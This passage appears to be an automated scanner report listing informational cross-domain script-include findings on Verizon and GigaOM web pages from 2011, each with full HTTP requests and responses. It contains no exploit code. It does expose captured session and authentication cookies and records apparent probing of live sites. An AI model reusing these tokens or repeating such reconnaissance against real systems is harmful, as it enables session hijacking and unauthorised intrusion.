<script type="text/javascript" src="http://r.turn.com/server/beacon_call.js?b2=VBucMrK7On88p9_lAJkjLUDEt8VsHQ0f1177BpSRU1SHDRKM8X_rBRqVIW4_D0WxggNtvcObuWXYbJuy6KoYbQ">
</script>
...[SNIP]...
<!-- End Turn Tracking Beacon Code Do Not Remove -->

<script language='JavaScript1.1' src='http://pixel.mathtag.com/event/js?mt_id=107806&mt_adid=100302&v1=&v2=&v3=&s1=&s2=&s3='></script>
...[SNIP]...

16.5. http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234571456.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1qpxk1wfeh8v1.cloudfront.net
Path:   /tags/1234571456.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tags/1234571456.html HTTP/1.1
Host: d1qpxk1wfeh8v1.cloudfront.net
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: q9iYskpUNHXsfpxrxzNmGO1ZhlcEQ3sbjXF3FbNwhAoje/2YkDdJoGlHBNDNddhi
x-amz-request-id: 521DCA4F7060D914
Date: Thu, 25 Aug 2011 16:40:37 GMT
x-amz-meta-s3fox-filesize: 1603
x-amz-meta-s3fox-modifiedtime: 1314142878346
Last-Modified: Wed, 24 Aug 2011 20:01:21 GMT
ETag: "7f3bbce8230dcfe1e1c6b3b266c9bed8"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 1603
Server: AmazonS3
Age: 64838
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: c323e91c050b5c25a364eeb8082932bb5d3c060736379d747d4b7b8d8aea09acd436aa5976863e0b
Via: 1.0 8ff11be393de0e3f4a1ed1dda26bfcdd.cloudfront.net:11180 (CloudFront), 1.0 6788ca0114a0c4ef3becec756fad24c9.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<html>
<head>
</head>
<body>

<!-- Insert any code or tags between here -->

<html>
<head>
</head>
<body>

<!-- Insert any code or tags between here -->

<!-- "Verizon Small Business" c/o "Cadreon", segment: 'SMB - Voice_Lead' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=72675&partnerID=134&clientID=2690&key=segment&returnType=js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://r.turn.com/server/beacon_call.js?b2=VBucMrK7On88p9_lAJkjLUDEt8VsHQ0f1177BpSRU1SHDRKM8X_rBRqVIW4_D0WxggNtvcObuWXYbJuy6KoYbQ">
</script>
...[SNIP]...
<!-- End Turn Tracking Beacon Code Do Not Remove -->

<script language='JavaScript1.1' src='http://pixel.mathtag.com/event/js?mt_id=107806&mt_adid=100302&v1=&v2=&v3=&s1=&s2=&s3='></script>
...[SNIP]...

16.6. http://d1qpxk1wfeh8v1.cloudfront.net/tags/totaltagdefault.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1qpxk1wfeh8v1.cloudfront.net
Path:   /tags/totaltagdefault.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tags/totaltagdefault.html HTTP/1.1
Host: d1qpxk1wfeh8v1.cloudfront.net
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: rZPoYQaUGLQ6sKLppFSf79qH3elcMVZfCjuimsJIWwl3Dhw9+pjq1ESBDE8xfdiw
x-amz-request-id: B03BB6A02002DEF8
Date: Fri, 05 Nov 2010 03:32:36 GMT
x-amz-meta-s3fox-filesize: 450
x-amz-meta-s3fox-modifiedtime: 1288200776090
Last-Modified: Wed, 27 Oct 2010 17:34:50 GMT
ETag: "0fc31b6da653526a0d1e7edd0df50c5e"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 450
Server: AmazonS3
Age: 32621
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: ca02ba0e614f8a3041933a50777f096145af8cca3e15cdc5b84b7f316a4350075781b2aefd6cde6f
Via: 1.0 a4a33eb6d328de8565b9c9b34e7c790d.cloudfront.net:11180 (CloudFront), 1.0 3db863a26c95a97ff57e55bdbbf10793.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<html><!-- "Verizon" c/o "Cadreon", segment: 'Total Tag Default - DO NOT USE' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=29265&partnerID=134&clientID=2540&key=segment&returnType=js"></script>
...[SNIP]...

16.7. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /activityi;src=2761768;type=consu459;cat=fiost917;ord=789927707519.3822? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 05 Sep 2011 22:18:32 GMT
Expires: Mon, 05 Sep 2011 22:18:32 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 615
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Segment Tag | A
...[SNIP]...
<div style="position:absolute;"><script src="http://cdn.flashtalking.com/container/vrzmvo/vrzmvo_cont_FIOSTVFeaturesPage.js"></script>
...[SNIP]...

16.8. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /activityi;src=2761768;type=consu459;cat=veriz742;ord=3888297551964.5366? HTTP/1.1
Host: fls.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 05 Sep 2011 22:14:36 GMT
Expires: Mon, 05 Sep 2011 22:14:36 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 963
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://idc
...[SNIP]...
<div style="position:absolute;"><script src="http://cdn.flashtalking.com/container/vrzmvo/vrzmvo_cont_VerizoncomHomepage.js"></script>
...[SNIP]...

16.9. http://forums.verizon.com/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.verizon.com
Path:   /t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248 HTTP/1.1
Host: forums.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#q=site:verizon.com+online+news+webmail&hl=en&prmd=ivns&ei=RVBlTuSuBePmiAKx7NyXCg&start=10&sa=N&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:42:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: VISITORID=1597650297; Domain=.verizon.com; Expires=Fri, 05-Sep-2014 16:09:13 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 194018
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
<![endif]-->


<script type="text/javascript" src="http://vrzn.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</div>
   
       
       <script type="text/javascript" src="http://vrzn.i.lithium.com/t5/scripts/EF6FE0F0F602A4D3CED80971609027D6/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://vrzn.i.lithium.com/t5/scripts/2D764F5A9BF264057B8A15FAD89E912C/lia-scripts-body-min.js"></script>
...[SNIP]...

16.10. http://gigaom.com/cloud/structure-50/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gigaom.com
Path:   /cloud/structure-50/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cloud/structure-50/ HTTP/1.1
Host: gigaom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Sep 2011 22:35:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 05 Sep 2011 22:35:27 +0000
Cache-Control: max-age=299, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://gigaom.com/xmlrpc.php
Link: <http://wp.me/p10LZV-1rLZ>; rel=shortlink
X-nananana: Batcache
Content-Length: 221328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Timer: [Init] 0.433 | 0.433 --><html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
</script>
       <script src='http://wordpress.com/remote-login.php?action=js&amp;host=gigaom.com&amp;id=14960843&amp;t=1315262127&amp;back=gigaom.com%2Fcloud%2Fstructure-50%2F' type="text/javascript"></script>
...[SNIP]...
<link rel='stylesheet' id='videoLightbox-css' href='http://s1.wp.com/wp-content/themes/vip/gigaom/css/videoLightbox.css?m=1308975764g&#038;ver=6' type='text/css' media='screen' />
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/jquery/jquery.js?m=1308975713g&amp;ver=1.6.1'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/jquery/ui.core.js?m=1308975713g&amp;ver=1.8.12'></script>
<script type='text/javascript' src='http://s2.wp.com/wp-includes/js/jquery/ui.widget.js?m=1308975713g&amp;ver=1.8.12'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/ui.tabs.js?m=1308975713g&amp;ver=1.8.12'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/ui.mouse.js?m=1308975713g&amp;ver=1.8.12'></script>
<script type='text/javascript' src='http://s2.wp.com/wp-includes/js/jquery/ui.resizable.js?m=1308975713g&amp;ver=1.8.12'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/jquery/ui.draggable.js?m=1308975713g&amp;ver=1.8.12'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/jquery/ui.button.js?m=1308975713g&amp;ver=1.8.12'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/ui.position.js?m=1308975713g&amp;ver=1.8.12'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/jquery/ui.dialog.js?m=1308975713g&amp;ver=1.8.12'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/plugins/go-social/js/identity.js?m=1312474709g&amp;ver=2'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/plugins/go-social/js/jquery.example.min.js?m=1310506872g&amp;ver=1'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/plugins/go-social/js/jquery.tools.min.js?m=1310506872g&amp;ver=2'></script>
<script type='text/javascript' src='http://platform.twitter.com/anywhere.js?id=0Yu0nIBvT6g1xRqJGXRA&#038;v=1&#038;ver=1'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/plugins/widgets/go-qwest/js/script.js?m=1308975761g&amp;ver=1'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/components/js/waypoints.min.js?m=1311203325g&amp;ver=1'></script>
<script type='text/javascript' src='http://www.google.com/jsapi?ver=MU'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/plugins/go-cse/js/go-cse.js?m=1314910166g&amp;ver=MU'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/comment-reply.js?m=1308975714g&amp;ver=20090102'></script>
...[SNIP]...
<meta name="msapplication-task" content="name=Subscribe;action-uri=http://feeds.feedburner.com/structureblog;icon-uri=http://1.gravatar.com/blavatar/f8748081423ce49bd3ecb267cd4effc7?s=16" />
           <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
           </script>
...[SNIP]...
<div class="video-player ooyala-video">        <script src="http://player.ooyala.com/player.js?width=393&amp;height=220&amp;embedCode=51eGJvMjqFMr1Skkr_zUlPhBeyFjvGH6&amp;view=channel&amp;wmode=opaque"></script>
...[SNIP]...
<!-- Quantcast -->
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script async='true' type="text/javascript" src="http://www.statcounter.com/counter/counter_xhtml.js"></script>
...[SNIP]...
<!-- Comscore Site Survey -->
<script async='true' src="http://siterecruit.comscore.com/sr/gigaom/broker.js"></script><script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/plugins/go-post-pager/js/go-post-pager.js?m=1308975761g&amp;ver=MU'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/js/jquery.cycle.min.js?m=1308975759g&amp;ver=6'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/js/min/jquery.videoLightbox.js?m=1308975759g&amp;ver=6'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/js/min/ooyala.js?m=1308975759g&amp;ver=6'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/js/fancybox/jquery.fancybox-1.3.0.pack.js?m=1308975759g&amp;ver=6'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/js/jquery.template.js?m=1309189091g&amp;ver=6'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/gigaom/js/jquery.cookie.js?m=1308975759g&amp;ver=6'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="https://apis.google.com/js/plusone.js">
       {"parsetags" : "explicit"}
   </script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?y&#038;ver=MU'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1311367673g&amp;ver=MU'></script>
...[SNIP]...
</script>
<script src="http://s.stats.wordpress.com/w.js?20" type="text/javascript"></script>
...[SNIP]...

16.11. https://login.verizonwireless.com/amserver/saml2/jsp/idpSSOInit.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.verizonwireless.com
Path:   /amserver/saml2/jsp/idpSSOInit.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /amserver/saml2/jsp/idpSSOInit.jsp HTTP/1.1
Host: login.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Identity Provider ID is null.
Server: VZW
Date: Mon, 05 Sep 2011 22:35:06 GMT
Connection: close
Cache-control: no-cache
Pragma: no-cache
Set-cookie: JSESSIONID=89A59939130D388D7849198CE10F65BE; Path=/amserver
Content-type: text/html
Content-length: 6496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="en-us">
<head>

...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://cache.vzw.com/stylesheets/accessiblePrint.css" />
           
       <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/udm-custom.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/udm-control.js"></script>
       <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/popup.js"></script>
       <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/button.js"></script>
...[SNIP]...

16.12. https://mblogin.verizonwireless.com/amserver/UI/Login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mblogin.verizonwireless.com
Path:   /amserver/UI/Login

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /amserver/UI/Login HTTP/1.1
Host: mblogin.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:31 GMT
Content-type: text/html;charset=ISO-8859-1
Cache-control: private
Pragma: no-cache
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-11
Am_client_type: genericHTML
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfcxncLgqljU9ptuqlsilHWOLxrcjydR8SCc%3D%40AAJTSQACMjMAAlMxAAJvMQ%3D%3D%23;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfcxncLgqljU9ptuqlsilHWOLxrcjydR8SCc%3D%40AAJTSQACMjMAAlMxAAJvMQ%3D%3D%23;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: brownie=o1;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: brownie=o1;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: SD=CARTCTR%3D0;Domain=.verizonwireless.com;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/
Connection: close
Content-Length: 18685


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script type="text/j
...[SNIP]...
<link href="https://scache.vzw.com/mybiz/core/styles/layout.css" rel="stylesheet" type="text/css" />
       <script src="https://scache.vzw.com/mybiz/selfservice/scripts/script.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://scache.vzw.com/mybiz/commerce/hbx/hbx_custom.js"></script>
       <script type="text/javascript" src="https://scache.vzw.com/mybiz/commerce/hbx/hbx_default_header.js"></script>
       <script type="text/javascript" src="https://scache.vzw.com/mybiz/core/scripts/mootools.js"></script>
       <script type="text/javascript" src="https://scache.vzw.com/mybiz/core/scripts/lib.js"></script>
       <script type="text/javascript" src="https://scache.vzw.com/mybiz/core/scripts/pngfix.js"></script>
       <script type="text/javascript" src="https://scache.vzw.com/mybiz/selfservice/scripts/ajaxOverlay.js"></script>
...[SNIP]...

16.13. http://newscenter.verizon.com/404.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newscenter.verizon.com
Path:   /404.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /404.html HTTP/1.1
Host: newscenter.verizon.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; VISITORID=1597650297; JSESSIONID=abcEBYCpNovpd9FINW7it; CONVIO.referrer=http%3A//newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:43:17 GMT
Set-Cookie: NSC_dnt_900_qvc=ffffffff09041e3145525d5f4f58455e445a4a4214f4;expires=Mon, 05-Sep-2011 23:43:17 GMT;path=/;httponly
Content-Length: 115137

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="generator" content="Convio CMS" />
<script language="JavaScrip
...[SNIP]...
<!-- Convio's CRM JS library -->
<script type="text/javascript" src="http://vznews.convio.net/js/utils.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://vznews.convio.net/css/FunctionalStyles.css" />
<script type="text/javascript" src="http://vznews.convio.net/yui3/yui/yui-min.js"></script>
<script type="text/javascript" src="http://vznews.convio.net/js/utils.js"></script>
<script type="text/javascript" src="http://vznews.convio.net/js/convio/modules.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="https://cmsadmin30.convio.net/system/auth/author-toolbar.jsp?hostID=136168508"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

16.14. http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newscenter.verizon.com
Path:   /fact-sheets/verizon-high-speed-internet.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /fact-sheets/verizon-high-speed-internet.html HTTP/1.1
Host: newscenter.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#q=site:verizon.com+online+news+webmail&hl=en&prmd=ivns&ei=U1BlTuKkG8bkiAKp37G7Cg&start=20&sa=N&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; VISITORID=1597650297

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:43:14 GMT
Set-Cookie: NSC_dnt_900_qvc=ffffffff09041e0f45525d5f4f58455e445a4a4214f4;expires=Mon, 05-Sep-2011 23:43:14 GMT;path=/;httponly
Content-Length: 125028

